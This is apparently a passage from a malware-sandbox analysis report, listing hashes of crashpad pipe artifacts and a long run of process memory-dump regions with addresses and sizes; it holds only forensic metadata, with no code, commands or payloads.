39f80c4d452a26def7a2d05f32a74e02
SHA1de6ef8e49e7725f627b1d748d7138c226bff75e1
SHA256f8d3c7043a3308cc1dedcf76bc0cd484df93822a7e3edddcab1595bb4959e582
SHA51297f6af2ca63a6784b9d63d996d68cec36b7eca8a39a85ea6ef3e3d540594944a7539266fec15fa4843ec1cd87d9523a723cedf00b6feaa5cc666b99ae67adf56
-
\??\pipe\crashpad_1480_LGOEEOZYUAQJUWFRMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
\??\pipe\crashpad_4656_BOXNNLMQPZNRXEAEMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
memory/648-143-0x0000000000000000-mapping.dmp
-
memory/908-149-0x0000000000000000-mapping.dmp
-
memory/912-259-0x000001E643CD0000-0x000001E643D42000-memory.dmpFilesize
456KB
-
memory/1020-279-0x00000208E1380000-0x00000208E13F2000-memory.dmpFilesize
456KB
-
memory/1052-257-0x000001D274080000-0x000001D2740F2000-memory.dmpFilesize
456KB
-
memory/1084-153-0x0000000000000000-mapping.dmp
-
memory/1128-228-0x0000000000000000-mapping.dmp
-
memory/1184-266-0x000001B755340000-0x000001B7553B2000-memory.dmpFilesize
456KB
-
memory/1220-157-0x0000000000000000-mapping.dmp
-
memory/1364-283-0x000001AF91C10000-0x000001AF91C82000-memory.dmpFilesize
456KB
-
memory/1380-201-0x0000000000000000-mapping.dmp
-
memory/1412-261-0x00000207142A0000-0x0000020714312000-memory.dmpFilesize
456KB
-
memory/1480-202-0x0000000000000000-mapping.dmp
-
memory/1616-199-0x0000000000000000-mapping.dmp
-
memory/1760-286-0x0000000000400000-0x0000000002BEA000-memory.dmpFilesize
39.9MB
-
memory/1760-284-0x0000000004880000-0x0000000004911000-memory.dmpFilesize
580KB
-
memory/1776-229-0x0000000000000000-mapping.dmp
-
memory/1852-263-0x0000018641740000-0x00000186417B2000-memory.dmpFilesize
456KB
-
memory/2012-219-0x0000000000000000-mapping.dmp
-
memory/2088-222-0x0000000000000000-mapping.dmp
-
memory/2144-215-0x0000000000000000-mapping.dmp
-
memory/2212-140-0x0000000000000000-mapping.dmp
-
memory/2272-213-0x0000000000000000-mapping.dmp
-
memory/2488-254-0x0000020F52430000-0x0000020F5247B000-memory.dmpFilesize
300KB
-
memory/2488-282-0x0000020F53140000-0x0000020F531B2000-memory.dmpFilesize
456KB
-
memory/2564-281-0x000002167E0A0000-0x000002167E112000-memory.dmpFilesize
456KB
-
memory/2704-230-0x0000000000000000-mapping.dmp
-
memory/2736-268-0x0000020851A30000-0x0000020851AA2000-memory.dmpFilesize
456KB
-
memory/2748-270-0x000002E17D000000-0x000002E17D072000-memory.dmpFilesize
456KB
-
memory/2856-277-0x0000028DDA600000-0x0000028DDA672000-memory.dmpFilesize
456KB
-
memory/3004-203-0x0000000000000000-mapping.dmp
-
memory/3032-314-0x0000000005770000-0x0000000005C6E000-memory.dmpFilesize
5.0MB
-
memory/3036-271-0x000000001CA40000-0x000000001CA42000-memory.dmpFilesize
8KB
-
memory/3040-255-0x0000000004310000-0x000000000436D000-memory.dmpFilesize
372KB
-
memory/3040-253-0x00000000029F0000-0x0000000002AF0000-memory.dmpFilesize
1024KB
-
memory/3096-307-0x0000000000400000-0x0000000000448000-memory.dmpFilesize
288KB
-
memory/3148-192-0x0000000000000000-mapping.dmp
-
memory/3492-309-0x00000000046D0000-0x0000000004714000-memory.dmpFilesize
272KB
-
memory/3680-121-0x0000000000000000-mapping.dmp
-
memory/3680-125-0x00007FFA768B0000-0x00007FFA768B1000-memory.dmpFilesize
4KB
-
memory/3692-122-0x0000000000000000-mapping.dmp
-
memory/3828-227-0x0000000000000000-mapping.dmp
-
memory/3880-221-0x0000000000000000-mapping.dmp
-
memory/3948-216-0x0000000000000000-mapping.dmp
-
memory/3964-300-0x0000000002450000-0x0000000002452000-memory.dmpFilesize
8KB
-
memory/3964-302-0x0000000002452000-0x0000000002454000-memory.dmpFilesize
8KB
-
memory/3964-303-0x0000000002454000-0x0000000002455000-memory.dmpFilesize
4KB
-
memory/3992-223-0x0000000000000000-mapping.dmp
-
memory/4000-225-0x0000000000000000-mapping.dmp
-
memory/4040-214-0x0000000000000000-mapping.dmp
-
memory/4060-175-0x0000000000000000-mapping.dmp
-
memory/4184-137-0x0000000000000000-mapping.dmp
-
memory/4188-276-0x00000216DC600000-0x00000216DC672000-memory.dmpFilesize
456KB
-
memory/4196-200-0x0000000000000000-mapping.dmp
-
memory/4220-218-0x0000000000000000-mapping.dmp
-
memory/4256-198-0x0000000000000000-mapping.dmp
-
memory/4256-220-0x0000000000000000-mapping.dmp
-
memory/4260-129-0x0000000000000000-mapping.dmp
-
memory/4312-205-0x0000000000000000-mapping.dmp
-
memory/4312-310-0x0000000000400000-0x0000000000447000-memory.dmpFilesize
284KB
-
memory/4344-207-0x0000000000000000-mapping.dmp
-
memory/4368-226-0x0000000000000000-mapping.dmp
-
memory/4392-206-0x0000000000000000-mapping.dmp
-
memory/4472-208-0x0000000000000000-mapping.dmp
-
memory/4480-194-0x0000000000000000-mapping.dmp
-
memory/4500-312-0x00000265FEDD0000-0x00000265FEDF0000-memory.dmpFilesize
128KB
-
memory/4500-311-0x0000000140000000-0x000000014070A000-memory.dmpFilesize
7.0MB
-
memory/4508-209-0x0000000000000000-mapping.dmp
-
memory/4528-195-0x0000000000000000-mapping.dmp
-
memory/4528-217-0x0000000000000000-mapping.dmp
-
memory/4532-183-0x0000000000000000-mapping.dmp
-
memory/4532-212-0x0000000000000000-mapping.dmp
-
memory/4596-211-0x0000000000000000-mapping.dmp
-
memory/4612-210-0x0000000000000000-mapping.dmp
-
memory/4700-187-0x0000000000000000-mapping.dmp
-
memory/4712-251-0x0000000000000000-mapping.dmp
-
memory/4716-273-0x000002646A630000-0x000002646A6A2000-memory.dmpFilesize
456KB
-
memory/4768-224-0x0000000000000000-mapping.dmp
-
memory/4848-116-0x0000000000000000-mapping.dmp
-
memory/4860-294-0x0000000000400000-0x000000000042B000-memory.dmpFilesize
172KB
-
memory/4864-196-0x0000000000000000-mapping.dmp
-
memory/4952-252-0x0000000002D00000-0x0000000002E9C000-memory.dmpFilesize
1.6MB
-
memory/4988-197-0x0000000000000000-mapping.dmp
-
memory/5124-231-0x0000000000000000-mapping.dmp
-
memory/5140-232-0x0000000000000000-mapping.dmp
-
memory/5176-315-0x0000000000400000-0x000000000040A000-memory.dmpFilesize
40KB
-
memory/5176-233-0x0000000000000000-mapping.dmp
-
memory/5300-234-0x0000000000000000-mapping.dmp
-
memory/5312-235-0x0000000000000000-mapping.dmp
-
memory/5336-295-0x00000000001E0000-0x00000000001E1000-memory.dmpFilesize
4KB
-
memory/5388-288-0x0000000010000000-0x0000000010145000-memory.dmpFilesize
1.3MB
-
memory/5388-285-0x00000000045A0000-0x00000000046DF000-memory.dmpFilesize
1.2MB
-
memory/5416-287-0x00000000055A0000-0x00000000055A1000-memory.dmpFilesize
4KB
-
memory/5424-236-0x0000000000000000-mapping.dmp
-
memory/5500-291-0x0000000004920000-0x0000000004921000-memory.dmpFilesize
4KB
-
memory/5500-308-0x0000000140000000-0x0000000140383000-memory.dmpFilesize
3.5MB
-
memory/5588-237-0x0000000000000000-mapping.dmp
-
memory/5648-238-0x0000000000000000-mapping.dmp
-
memory/5700-240-0x0000000000000000-mapping.dmp
-
memory/5716-242-0x0000000000000000-mapping.dmp
-
memory/5756-246-0x0000000000000000-mapping.dmp
-
memory/5784-249-0x0000000000000000-mapping.dmp
-
memory/5804-250-0x0000000000000000-mapping.dmp
-
memory/5872-296-0x00000000012F0000-0x00000000012F2000-memory.dmpFilesize
8KB
-
memory/5884-298-0x00000000001E0000-0x00000000001E1000-memory.dmpFilesize
4KB
-
memory/5892-306-0x00000000027E5000-0x00000000027E7000-memory.dmpFilesize
8KB
-
memory/5892-304-0x00000000027E2000-0x00000000027E4000-memory.dmpFilesize
8KB
-
memory/5892-305-0x00000000027E4000-0x00000000027E5000-memory.dmpFilesize
4KB
-
memory/5892-301-0x00000000027E0000-0x00000000027E2000-memory.dmpFilesize
8KB
-
memory/5892-313-0x00000000027E7000-0x00000000027E9000-memory.dmpFilesize
8KB
-
memory/5932-293-0x0000017E37F00000-0x0000017E38005000-memory.dmpFilesize
1.0MB
-
memory/5932-290-0x0000017E35A40000-0x0000017E35AB2000-memory.dmpFilesize
456KB
-
memory/5932-289-0x0000017E35750000-0x0000017E3579B000-memory.dmpFilesize
300KB
-
memory/5964-299-0x0000000001470000-0x0000000001472000-memory.dmpFilesize
8KB
-
memory/5968-297-0x0000000000400000-0x0000000000416000-memory.dmpFilesize
88KB
-
memory/5980-292-0x0000000005210000-0x0000000005211000-memory.dmpFilesize
4KB